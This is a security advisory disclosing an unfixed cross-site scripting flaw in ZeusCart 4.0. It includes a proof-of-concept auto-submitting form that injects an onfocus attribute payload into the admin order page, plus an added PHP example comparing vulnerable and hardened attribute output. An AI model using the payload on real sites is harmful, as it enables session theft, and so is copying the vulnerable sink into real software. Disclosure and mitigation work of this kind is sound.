ZeusCart version 4.0 suffers from a cross-site scripting vulnerability.
ZeusCart 4.0: XSS
Security Advisory – Curesec Research Team
1. Introduction
Affected Product: ZeusCart 4.0
Fixed in: not fixed
Fixed Version Link: n/a
Vendor Contact: support@zeuscart.com
Vulnerability Type: XSS
Remote Exploitable: Yes
Reported to vendor: 08/13/2015
Disclosed to public: 09/14/2015
Release mode: Full Disclosure
CVE: n/a
Credits: Tim Coen of Curesec GmbH
2. Vulnerability Description
There is an XSS vulnerability via the "txtstreet" POST parameter when
adding a new order. With this, it is possible to steal cookies or inject
JavaScript keyloggers.
3. Proof of Concept
<form name="myform" method="post" action="http://localhost/zeuscart-master/admin/index.php?do=addUserOrder&action=create">
<input type="hidden" name="hidOrderTotal" value="400">
<input type="hidden" name="discount" value="flat">
<input type="hidden" name="selCustomer" value="1">
<input type="hidden" name="payOption" value="8">
<input type="hidden" name="txtname" value="Primary">
<input type="hidden" name="txtstreet" value="foo autofocus onfocus=alert(1); bar">
</form>
<script>document.myform.submit();</script>
4. Solution
This issue was not fixed by the vendor.
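Because no vendor fix exists, the following added example (not ZeusCart code and not part of the original advisory) shows an output-side mitigation for the value used in the proof of concept. It assumes the street value is echoed into an HTML attribute, which the advisory does not state; the function names are hypothetical, and it requires PHP 7.0 or later with the DOM extension.

```php
<?php
// Added illustration, not ZeusCart source. The output sink is an assumption:
// the advisory does not show how txtstreet is written back into the page.

// Value taken from the advisory's proof of concept.
$street = 'foo autofocus onfocus=alert(1); bar';

// Hypothetical vulnerable sink: unquoted attribute, raw value.
function render_unquoted_raw(string $v): string
{
    return '<input type=text name=txtstreet value=' . $v . '>';
}

// Encoding alone is not enough: the value holds none of & < > " ' so
// htmlspecialchars() returns it unchanged and whitespace still ends the attribute.
function render_unquoted_encoded(string $v): string
{
    return '<input type=text name=txtstreet value='
        . htmlspecialchars($v, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') . '>';
}

// Hardened sink: quoted attribute plus attribute-context encoding.
function render_quoted_encoded(string $v): string
{
    return '<input type="text" name="txtstreet" value="'
        . htmlspecialchars($v, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') . '">';
}

// Parse the markup with the DOM extension and list on* attributes of the input.
function event_handlers(string $html): array
{
    $doc = new DOMDocument();
    @$doc->loadHTML($html); // suppress warnings about the sloppy markup
    $found = [];
    foreach ($doc->getElementsByTagName('input')->item(0)->attributes as $attr) {
        if (stripos($attr->name, 'on') === 0) {
            $found[] = $attr->name;
        }
    }
    return $found;
}

// Report which event-handler attributes survive parsing for each rendering.
foreach (['render_unquoted_raw', 'render_unquoted_encoded', 'render_quoted_encoded'] as $fn) {
    printf("%-24s %s\n", $fn, json_encode(event_handlers($fn($street))));
}
```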
5. Report Timeline
08/13/2015 Informed Vendor about Issue (no reply)
09/07/2015 Reminded Vendor of release date (no reply)
09/14/2015 Disclosed to public
6. Blog Reference:
http://blog.curesec.com/article/blog/ZeusCart-40-XSS-55.html